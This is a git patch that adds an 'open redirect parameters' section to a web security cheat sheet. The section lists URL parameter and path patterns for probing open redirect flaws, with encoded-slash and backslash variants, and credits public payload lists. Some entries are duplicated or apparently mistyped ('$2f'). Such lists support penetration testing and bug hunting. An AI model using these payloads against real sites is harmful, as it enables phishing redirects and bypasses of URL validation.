From c60e6a28077cc96f40fab93c80ab596926d50dbb Mon Sep 17 00:00:00 2001 From: 003random <003random@protonmail.com> Date: Wed, 25 Oct 2017 20:19:49 +0200 Subject: [PATCH] Update open-redirect.md Added open redirect parameters --- cheatsheets/open-redirect.md | 132 +++++++++++++++++++++++++++++++++++ 1 file changed, 132 insertions(+) diff --git a/cheatsheets/open-redirect.md b/cheatsheets/open-redirect.md index 6196923..459cc1b 100644 --- a/cheatsheets/open-redirect.md +++ b/cheatsheets/open-redirect.md @@ -24,7 +24,139 @@ //google.com/%2f.. ``` +## Possible open redirect parameters + +``` +?url=http://{target} +``` + +``` +?url=https://{target} +``` + +``` +?next=http://{target} +``` + +``` +?next=https://{target} +``` + +``` +?url=https://{target} +``` + +``` +?url=http://{target} +``` + +``` +?url=//{target} +``` + +``` +?url=$2f%2f{target} +``` + +``` +?next=//{target} +``` + +``` +?next=$2f%2f{target} +``` + +``` +?url=//{target} +``` + +``` +?url=$2f%2f{target} +``` + +``` +?url=//{target} +``` + +``` +/redirect/{target} +``` + +``` +/cgi-bin/redirect.cgi?{target} +``` + +``` +/out/{target} +``` + +``` +/out?{target} +``` + +``` +/out?/{target} +``` + +``` +/out?//{target} +``` + +``` +/out?/\{target} +``` + +``` +/out?///{target} +``` + +``` +?view={target} +``` + +``` +?view=/{target} +``` + +``` +?view=//{target} +``` + +``` +?view=/\{target} +``` + +``` +?view=///{target} +``` + +``` +/login?to={target} +``` + +``` +/login?to=/{target} +``` + +``` +/login?to=//{target} +``` + +``` +/login?to=/\{target} +``` + +``` +/login?to=///{target} +``` + + **Open Redirect Payloads** by @cujanovic https://github.com/cujanovic/Open-Redirect-Payloads + + +**Open Redirect Paramters** by @fuzzdb-project + +https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt